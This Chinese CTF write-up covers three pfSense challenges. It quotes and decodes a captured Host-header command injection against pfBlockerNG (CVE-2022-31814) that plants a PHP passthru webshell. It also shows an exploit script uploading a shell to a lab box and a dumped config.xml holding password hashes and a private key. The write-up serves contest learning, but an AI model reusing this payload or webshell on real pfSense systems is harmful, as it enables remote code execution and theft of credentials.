【MISC】pfsense1
【2025春季个人挑战赛】 1、从流量数据包中找出攻击者利用漏洞开展攻击的会话,写出其中攻击者执行的命令中设置的flag内容 附件链接:https://pan.baidu.com/s/1qsADXodtAmARGV7kdRuPSQ?pwd=ngt7 题目pfsense1~3共用一个附件 解压密码:e6a06e373c007c352d53be51a82e4874 ps:威胁检测与网络流量分析题目暂时放在MISC模块
NetA速秒
[+] TCP数据流检测到文件,已保存至:output/2025-03-24-121912\1742789961.1554654.gif
[+] TCP流【1】数据:GET //pfblockerng/www/index.php HTTP/1.1
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Host: ' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+ZmxhZ3tjOTMwYTIwNzI5Y2Q3MTBjOWFjMmUxYmNkMzY4NTZlNX0='|python3.8 -m base64 -d | php; '对底下部分解码
拿到
<?$a=fopen("/usr/local/www/system_advanced_control.php","w") or die();$t='<?php print(passthru( $_GET["c"]));?>';fwrite($a,$t);fclose( $a);?>flag{c930a20729cd710c9ac2e1bcd36856e5}【MISC】pfsense2
【2025春季个人挑战赛】 2、攻击者通过漏洞利用获取设备控制权限,然后查找设备上的flag文件,写出flag的文件内容
按照题目要求开环境
然后环境让登录
没账密没办法
现在看到刚刚拿到的flag前面的内容
搜索
找到一个相关的CVE
CVE-2022-31814pfsense远程命令执行漏洞复现与exp利用-CSDN博客
利用对应的exp
打通
Windows PowerShell
版权所有(C) Microsoft Corporation。保留所有权利。
安装最新的 PowerShell,了解新功能和改进!https://aka.ms/PSWindows
(.venv) PS D:\python\pythonProject> python 54.py --url http://61.139.2.139/
[+] pfBlockerNG is installed
[/] Uploading shell...
[+] Upload succeeded
使用命令
find / -name flag*# find / -name flag*
/usr/libexec/bsdconfig/110.mouse/flags
/home/ctfer/flag.txtcat /home/ctfer/flag.txt拿到flag
flag{1b030dacb6e82a5cca0b1e6d2c8779fa}
【MISC】pfsense3
【2025春季个人挑战赛】 3、找出并提交受控机设备中普通用户的IPsec预共享密钥
网上搜索IPsec是啥
然后对应pfsense
找到
在 pfSense 中,IPsec 预共享密钥相关信息存储在配置文件中,该配置文件通常是/conf/config.xml 。
指令:
cat /conf/config.xml# cat /conf/config.xml
<?xml version="1.0"?>
<pfsense>
<version>22.2</version>
<lastchange></lastchange>
<system>
<optimization>normal</optimization>
<hostname>pfSense</hostname>
<domain>pfsenseCTF.com</domain>
<group>
<name>all</name>
<description><![CDATA[All Users]]></description>
<scope>system</scope>
<gid>1998</gid>
</group>
<group>
<name>admins</name>
<description><![CDATA[System Administrators]]></description>
<scope>system</scope>
<gid>1999</gid>
<priv>page-all</priv>
</group>
<user>
<name>admin</name>
<descr><![CDATA[System Administrator]]></descr>
<scope>system</scope>
<groupname>admins</groupname>
<sha512-hash>$6$cbf23094c6e25075$NDSKnw8Ph8E1Z.Myh5985qzxSzE6XQ1u5E0cxn34yNAOhimReg0Ws2ZjLgSa.gcWlqrO1HVW.p8.ksD4idQ6r1</sha512-hash>
<uid>0</uid>
<priv>user-shell-access</priv>
<expires></expires>
<dashboardcolumns>2</dashboardcolumns>
<authorizedkeys>ZmFpcnlmdXJyeQ==</authorizedkeys>
<ipsecpsk></ipsecpsk>
<webguicss>pfSense.css</webguicss>
</user>
<user>
<scope>user</scope>
<sha512-hash>$6$6dc614aef87c6695$ovy9kvhlR45TwQ7D2.tF91hugHlYEafEzGsPT7FdKcbjA1cdNvSJbzYXuFsiV1PWM4hWKLk/i4Y4.sFWdw3/L0</sha512-hash>
<descr></descr>
<name>ctfer</name>
<expires></expires>
<dashboardcolumns>2</dashboardcolumns>
<authorizedkeys></authorizedkeys>
<ipsecpsk>flag{bde4b5e2d0c43c177895f6f5d85beb97}</ipsecpsk>
<webguicss>pfSense.css</webguicss>
<uid>2000</uid>
</user>
<nextuid>2001</nextuid>
<nextgid>2000</nextgid>
<timeservers>ntp1.aliyun.com</timeservers>
<webgui>
<protocol>http</protocol>
<loginautocomplete></loginautocomplete>
<ssl-certref>67ad2dcbd6a1f</ssl-certref>
<dashboardcolumns>2</dashboardcolumns>
<webguicss>pfSense.css</webguicss>
<logincss>1e3f75;</logincss>
<port></port>
<max_procs>2</max_procs>
</webgui>
<disablenatreflection>yes</disablenatreflection>
<disablesegmentationoffloading></disablesegmentationoffloading>
<disablelargereceiveoffloading></disablelargereceiveoffloading>
<ipv6allow></ipv6allow>
<maximumtableentries>400000</maximumtableentries>
<powerd_ac_mode>hadp</powerd_ac_mode>
<powerd_battery_mode>hadp</powerd_battery_mode>
<powerd_normal_mode>hadp</powerd_normal_mode>
<bogons>
<interval>monthly</interval>
</bogons>
<hn_altq_enable></hn_altq_enable>
<ssh>
<enable>enabled</enable>
</ssh>
<timezone>Asia/Shanghai</timezone>
<language>zh_Hans_CN</language>
<pkg_repo_conf_path>/usr/local/share/pfSense/pkg/repos/pfSense-repo-previous.conf</pkg_repo_conf_path>
<dnsserver>8.8.8.8</dnsserver>
<dnsallowoverride></dnsallowoverride>
<disableconsolemenu></disableconsolemenu>
<serialspeed>115200</serialspeed>
<primaryconsole>serial</primaryconsole>
<sshguard_threshold></sshguard_threshold>
<sshguard_blocktime></sshguard_blocktime>
<sshguard_detection_time></sshguard_detection_time>
<sshguard_whitelist></sshguard_whitelist>
</system>
<interfaces>
<wan>
<enable></enable>
<if>vmx0</if>
<ipaddr>dhcp</ipaddr>
<ipaddrv6>dhcp6</ipaddrv6>
<gateway></gateway>
<blockpriv>on</blockpriv>
<blockbogons>on</blockbogons>
<media></media>
<mediaopt></mediaopt>
<dhcp6-duid></dhcp6-duid>
<dhcp6-ia-pd-len>0</dhcp6-ia-pd-len>
</wan>
<lan>
<enable></enable>
<if>vmx1</if>
<ipaddr>61.139.2.139</ipaddr>
<subnet>24</subnet>
<ipaddrv6></ipaddrv6>
<subnetv6></subnetv6>
<media></media>
<mediaopt></mediaopt>
<track6-interface>wan</track6-interface>
<track6-prefix-id>0</track6-prefix-id>
<gateway></gateway>
<gatewayv6></gatewayv6>
</lan>
</interfaces>
<staticroutes></staticroutes>
<dhcpd>
<lan>
<enable></enable>
<range>
<from>61.139.2.10</from>
<to>61.139.2.130</to>
</range>
</lan>
</dhcpd>
<dhcpdv6>
<lan>
<range>
<from>::1000</from>
<to>::2000</to>
</range>
<ramode>disabled</ramode>
<rapriority>medium</rapriority>
</lan>
</dhcpdv6>
<snmpd>
<syslocation></syslocation>
<syscontact></syscontact>
<rocommunity>public</rocommunity>
</snmpd>
<diag>
<ipv6nat>
<ipaddr></ipaddr>
</ipv6nat>
</diag>
<syslog>
<filterdescriptions>1</filterdescriptions>
</syslog>
<nat>
<outbound>
<mode>automatic</mode>
</outbound>
</nat>
<filter>
<rule>
<type>pass</type>
<ipprotocol>inet</ipprotocol>
<descr><![CDATA[Default allow LAN to any rule]]></descr>
<interface>lan</interface>
<tracker>0100000101</tracker>
<source>
<network>lan</network>
</source>
<destination>
<any></any>
</destination>
</rule>
<rule>
<type>pass</type>
<ipprotocol>inet6</ipprotocol>
<descr><![CDATA[Default allow LAN IPv6 to any rule]]></descr>
<interface>lan</interface>
<tracker>0100000102</tracker>
<source>
<network>lan</network>
</source>
<destination>
<any></any>
</destination>
</rule>
</filter>
<shaper></shaper>
<ipsec>
<client></client>
</ipsec>
<aliases>
</aliases>
<proxyarp></proxyarp>
<cron>
<item>
<minute>*/1</minute>
<hour>*</hour>
<mday>*</mday>
<month>*</month>
<wday>*</wday>
<who>root</who>
<command>/usr/sbin/newsyslog</command>
</item>
<item>
<minute>1</minute>
<hour>3</hour>
<mday>*</mday>
<month>*</month>
<wday>*</wday>
<who>root</who>
<command>/etc/rc.periodic daily</command>
</item>
<item>
<minute>15</minute>
<hour>4</hour>
<mday>*</mday>
<month>*</month>
<wday>6</wday>
<who>root</who>
<command>/etc/rc.periodic weekly</command>
</item>
<item>
<minute>30</minute>
<hour>5</hour>
<mday>1</mday>
<month>*</month>
<wday>*</wday>
<who>root</who>
<command>/etc/rc.periodic monthly</command>
</item>
<item>
<minute>1,31</minute>
<hour>0-5</hour>
<mday>*</mday>
<month>*</month>
<wday>*</wday>
<who>root</who>
<command>/usr/bin/nice -n20 adjkerntz -a</command>
</item>
<item>
<minute>1</minute>
<hour>3</hour>
<mday>1</mday>
<month>*</month>
<wday>*</wday>
<who>root</who>
<command>/usr/bin/nice -n20 /etc/rc.update_bogons.sh</command>
</item>
<item>
<minute>1</minute>
<hour>1</hour>
<mday>*</mday>
<month>*</month>
<wday>*</wday>
<who>root</who>
<command>/usr/bin/nice -n20 /etc/rc.dyndns.update</command>
</item>
<item>
<minute>*/60</minute>
<hour>*</hour>
<mday>*</mday>
<month>*</month>
<wday>*</wday>
<who>root</who>
<command>/usr/bin/nice -n20 /usr/local/sbin/expiretable -v -t 3600 virusprot</command>
</item>
<item>
<minute>30</minute>
<hour>12</hour>
<mday>*</mday>
<month>*</month>
<wday>*</wday>
<who>root</who>
<command>/usr/bin/nice -n20 /etc/rc.update_urltables</command>
</item>
<item>
<minute>1</minute>
<hour>0</hour>
<mday>*</mday>
<month>*</month>
<wday>*</wday>
<who>root</who>
<command>/usr/bin/nice -n20 /etc/rc.update_pkg_metadata</command>
</item>
</cron>
<wol></wol>
<rrd>
<enable></enable>
</rrd>
<widgets>
<sequence>system_information:col1:show,disks:col1:show,netgate_services_and_support:col2:show,interfaces:col2:show,pfblockerng:col2:open:0</sequence>
<period>10</period>
</widgets>
<openvpn></openvpn>
<dnshaper></dnshaper>
<unbound>
<enable></enable>
<dnssec></dnssec>
<active_interface></active_interface>
<outgoing_interface></outgoing_interface>
<custom_options></custom_options>
<hideidentity></hideidentity>
<hideversion></hideversion>
<dnssecstripped></dnssecstripped>
</unbound>
<vlans></vlans>
<qinqs></qinqs>
<revision>
<time>1742789993</time>
<description><![CDATA[(system): pfBlockerNG: saving Aliases]]></description>
<username><![CDATA[(system)]]></username>
</revision>
<gateways></gateways>
<dnsmasq></dnsmasq>
<ntpd>
<enable>enabled</enable>
<orphan></orphan>
<ntpminpoll></ntpminpoll>
<ntpmaxpoll></ntpmaxpoll>
<dnsresolv>auto</dnsresolv>
</ntpd>
<cert>
<refid>67ad2dcbd6a1f</refid>
<descr><![CDATA[webConfigurator default (67ad2dcbd6a1f)]]></descr>
<type>server</type>
<crt>LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUVsRENDQTN5Z0F3SUJBZ0lJQTJUczh5cFZwREl3RFFZSktvWklodmNOQVFFTEJRQXdXakU0TURZR0ExVUUKQ2hNdmNHWlRaVzV6WlNCM1pXSkRiMjVtYVd
kMWNtRjBiM0lnVTJWc1ppMVRhV2R1WldRZ1EyVnlkR2xtYVdOaApkR1V4SGpBY0JnTlZCQU1URlhCbVUyVnVjMlV0TmpkaFpESmtZMkprTm1FeFpqQWVGdzB5TlRBeU1USXlNekkxCk1EQmFGdzB5TmpBek1UY3lNekkxTURCYU1Gb3hPREE
yQmdOVkJBb1RMM0JtVTJWdWMyVWdkMlZpUTI5dVptbG4KZFhKaGRHOXlJRk5sYkdZdFUybG5ibVZrSUVObGNuUnBabWxqWVhSbE1SNHdIQVlEVlFRREV4VndabE5sYm5ObApMVFkzWVdReVpHTmlaRFpoTVdZd2dnRWlNQTBHQ1NxR1NJYjN
EUUVCQVFVQUE0SUJEd0F3Z2dFS0FvSUJBUUM2Ci9XZlNXSlhHMW5QZHhIMUlXa25oQW82a3hpeGJoU1dYUWx5Ly9KbENGYWRnMUpjMXZBdUpkQXZuU0JsdEdNRisKREdnNENHK2lTNUhhQ2VsOGcybzhoU01EUXFhNW9oUjhoaVh1Z1RvRVd
5c0ZUbUcwVi9HbmZGZTBiUVZVZXVCUwpINTdralJpOVN0bWdQWjN6NHJIdzBPTDVRSXJ2dE5BVldCNXk1bWV4RmJIMUlQMlFaQ0l5dWdJTkJxTmRsNlZYCmxpQ3pNM1NITDJXWXdlcjRBTjAwRHVoVlA3aUdNVXlDdWpYOStvOXlvdTQvYU1
mNXd5OE1ER1FKd0JIRnlsOU8KS1dIS1RQeldTZDhIRUc2Z0NRWE5BRjZiTCt1M2IxUFNNeTlDWDNlWVoybENvbHZ5U0xCcHFidHUvbElETGpFaQpFVW43RlBYNUczYzhHUmUzNVlpdkFnTUJBQUdqZ2dGY01JSUJXREFKQmdOVkhSTUVBakF
BTUJFR0NXQ0dTQUdHCitFSUJBUVFFQXdJR1FEQUxCZ05WSFE4RUJBTUNCYUF3TXdZSllJWklBWWI0UWdFTkJDWVdKRTl3Wlc1VFUwd2cKUjJWdVpYSmhkR1ZrSUZObGNuWmxjaUJEWlhKMGFXWnBZMkYwWlRBZEJnTlZIUTRFRmdRVVB6ZDQ
5SXdiLzRpaApMaWFST2tWK0NGbnNYNXN3Z1lzR0ExVWRJd1NCZ3pDQmdJQVVQemQ0OUl3Yi80aWhMaWFST2tWK0NGbnNYNXVoClhxUmNNRm94T0RBMkJnTlZCQW9UTDNCbVUyVnVjMlVnZDJWaVEyOXVabWxuZFhKaGRHOXlJRk5sYkdZdFU
ybG4KYm1Wa0lFTmxjblJwWm1sallYUmxNUjR3SEFZRFZRUURFeFZ3WmxObGJuTmxMVFkzWVdReVpHTmlaRFpoTVdhQwpDQU5rN1BNcVZhUXlNQ2NHQTFVZEpRUWdNQjRHQ0NzR0FRVUZCd01CQmdnckJnRUZCUWNEQWdZSUt3WUJCUVVJCkF
nSXdJQVlEVlIwUkJCa3dGNElWY0daVFpXNXpaUzAyTjJGa01tUmpZbVEyWVRGbU1BMEdDU3FHU0liM0RRRUIKQ3dVQUE0SUJBUUFPbTZCcGtwdG5CL0I5UlRuZmFnbDdWVFZQNGl1bStxeVFvSGdmb1RyM3ZyYXpSSkdvU1lHWQpMa2lYNEh
ZTHZ4Vzl5MjQ1NDNXU0sxREJHMCtIMUU0ZjV4SW9qb051bU5TQnhiNWE1TEY2djcvb0ltclZXYlU4CldtTmRxMXFlSi94ZWRoYzJSNDBtWkJXZEVDLzNzVDdEckQxVnpqRERmK2hRSkE1UWNDZ0hEaVpaK3BOVzh5VjMKcC9MMG41WHRYMXJ
KbGNGeTNsUmVVc1ZZYlh3alVGTGtjcXRxcGFaSDdJM2JEUVBvVWcvK2N1blJCSmNKR3dvbgpZVVRDN21YT25GOGRmeS9wQ0w1SnJTSTJ4WnNKRTJPYmw3YThNVDZ4MmZJWWtyN3dsSXJzcUNpUU5JM3FQNXUwClFJY0E2QmhydEF5dG1LNi9CQXZiNmJoTEcySGNoaHlSCi0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K</crt>
<prv>LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk1JSUV2Z0lCQURBTkJna3Foa2lHOXcwQkFRRUZBQVNDQktnd2dnU2tBZ0VBQW9JQkFRQzYvV2ZTV0pYRzFuUGQKeEgxSVdrbmhBbzZreGl4YmhTV1hRbHkvL0p
sQ0ZhZGcxSmMxdkF1SmRBdm5TQmx0R01GK0RHZzRDRytpUzVIYQpDZWw4ZzJvOGhTTURRcWE1b2hSOGhpWHVnVG9FV3lzRlRtRzBWL0duZkZlMGJRVlVldUJTSDU3a2pSaTlTdG1nClBaM3o0ckh3ME9MNVFJcnZ0TkFWV0I1eTVtZXhGYkg
xSVAyUVpDSXl1Z0lOQnFOZGw2VlhsaUN6TTNTSEwyV1kKd2VyNEFOMDBEdWhWUDdpR01VeUN1alg5K285eW91NC9hTWY1d3k4TURHUUp3QkhGeWw5T0tXSEtUUHpXU2Q4SApFRzZnQ1FYTkFGNmJMK3UzYjFQU015OUNYM2VZWjJsQ29sdnl
TTEJwcWJ0dS9sSURMakVpRVVuN0ZQWDVHM2M4CkdSZTM1WWl2QWdNQkFBRUNnZ0VCQUp1bENJRlBHVVRNQnQvbWlQM3JvYWs0cnJFNi8zc2loaHEwczIxZS9kYkQKSFhKOUltd28zVldKa2NydStiTVVzeUtQZzBSNHlTdEhTZDA2K08yYW1
aaE1uY3M5OUhkNkVTRmhyRHN0dDdRZQppdDI4MDVrQXh2WkppdHQxRDhXMURmbHR0cDI1VUlsbnYyUWhSZFBXczVTbTJ2YnNJWG5MZ0pUenAweXV1a3JzClBGUGtDQzZQTGhOSUZNbk5zL1R5LzdJZ0R5bUd4NS9YQTVwT1RCWm5lNHlHZTU
0bWpMR0hrV0lxYnU1Ymt2YmoKemNOcWpJSGVySUpydkw2K3ZibW5TVjBDalFUdk4vZ29FU1IxTzBtS3FlQ1pnbWV2QUR3UDUyREhrbFV0NUpVZgp0eGh5Mm5Dd3czOFk5U2VycVJPT0NOaVRhemJFaXdmeFAwU1FqRHhwNi9FQ2dZRUE5aVJ
UT0x6c0tnWmMrdEFUClpRU0ZhN2ZxU2lTNHRKa0FYcGJCTGtOV2p2Z09Hb2sveDdKUUk5YXNUS2IyNHpab3R2U29uQjhzY3pMbG53amMKeXVOR3RUVjZGSVFrNG5vNGZYaHNYemxrZzZma0pETWd3WmFGWFgxdXNoZUVYeU16eFNhbjVPRWl
KTHJ3Y1J6NApnYmRISWd3OG9CTm9wZVVKdUNRWWtpK2FFNWtDZ1lFQXducVpXV3d0V3M5dUZpTnhNM0JORU5lYlJwS0JtSXk3Cnlacmd1YTRqdHZiK21pNk83LzhrU1RDczRhdzVrR1VpMk9GTS9Fb3dVeElGNC85ZGN0RkhBNDRSVFhrN2l
vMy8KN1V4eEVadVBPcC9scEEwWWY4RU9sb0VsNnJNb3BwcTNDM0RHR2t6K0w2cG5lN2JtdGVtSSsrcXlpdnpReUN6NgpTbU5UODcrK3E0Y0NnWUVBdTlWa25MdXZEVExsNlpDMy9ETEREankvVWUxTDlxVjduck0wb0hWS3JMZW5LNkRwClJ
4OVFBTWxsbXVrZkpxenlwQXQ0VUF1S0JDOG5BNEhqM0FBc2lVUlI4UzRXWjY0VlJjcU1DTzduUVlEeG5KNVgKdE9PRXlwOVp4aFlrTWVYUEwvZ2J6NUh1V0ZGQUExRzBZbWpXbzZqcTZzMWs0cFF5SW8rSklLV3EwcUVDZ1lBNwpPWWExdXN
IZEk4cE1wNkp6bmNGNlhZNkY0VnZpRHdtcERhZGVKRy92Nml3QzNDYmZZMzJ6WkVWaHZFY1RlQmt5Cm52b0k0cmJ3dFU1aDdvU1EwTGFsbUlBZ2JjajZHdUJUYmJJSlFLeFBtQjRnNVhRT2c4WmpneFQrOG14d3dERDYKSk8vUFZwOForUFR
tc2Y1MGE1Z3h6M2xyNWkzV3FBdlkxNExiZWdzZ3hRS0JnQlJUZmllNHdQQmhYM2o0MzRFdQpDeGJITFpzaEhBSXdGZDNqRWY1cDNreW9DWjJDcHlQazMvY2JXVkE4cXJwMVVTMnovakZRcWllT2xvbWN0M0JwCmRMUG5TRUR4Rm1WYWt4Q1c2UVIxTG9XT3dtTUVtaytSSWc4aDJBK0tmVUJENjVLM21TdUxIai8xR3ZzOCt0TCsKZzRXcVZ5WFpERDJWZTJIcXVBODUva2JqCi0tLS0tRU5EIFBSSVZBVEUgS0VZLS0tLS0K</prv>
</cert>
<ppps></ppps>
<installedpackages>
<package>
<name>pfBlockerNG</name>
<descr><![CDATA[Manage IPv4/v6 List Sources into 'Deny, Permit or Match' formats.<br />
GeoIP database by MaxMind Inc. (GeoLite2 Free version).<br />
De-Duplication, Suppression, and Reputation enhancements.<br />
Provision to download from diverse List formats.<br />
Advanced Integration for Proofpoint ET IQRisk IP Reputation Threat Sources.<br />
Domain Name (DNSBL) blocking via Unbound DNS Resolver.]]></descr>
<pkginfolink>https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html</pkginfolink>
<version>3.2.0_4</version>
<configurationfile>pfblockerng.xml</configurationfile>
<include_file>/usr/local/pkg/pfblockerng/pfblockerng.inc</include_file>
</package>
<pfblockerng>
<config></config>
</pfblockerng>
<pfblockerngipsettings>
<config></config>
</pfblockerngipsettings>
<pfblockerngdnsblsettings></pfblockerngdnsblsettings>
<pfblockerngblacklist></pfblockerngblacklist>
<pfblockerngglobal></pfblockerngglobal>
<pfblockerngsafesearch></pfblockerngsafesearch>
<menu>
<name>pfBlockerNG</name>
<section>Firewall</section>
<url>/pfblockerng/pfblockerng_general.php</url>
</menu>
• <service>
• <name>pfb_dnsbl</name>
• <rcfile>pfb_dnsbl.sh</rcfile>
• <executable>lighttpd_pfb</executable>
• <description><![CDATA[pfBlockerNG DNSBL service]]></description>
• </service>
• <service>
• <name>pfb_filter</name>
• <rcfile>pfb_filter.sh</rcfile>
• <executable>php_pfb</executable>
• <description><![CDATA[pfBlockerNG firewall filter service]]></description>
• </service>
• </installedpackages>
• <virtualip></virtualip>
</pfsense>里面存在很明显的flag字样
flag即是答案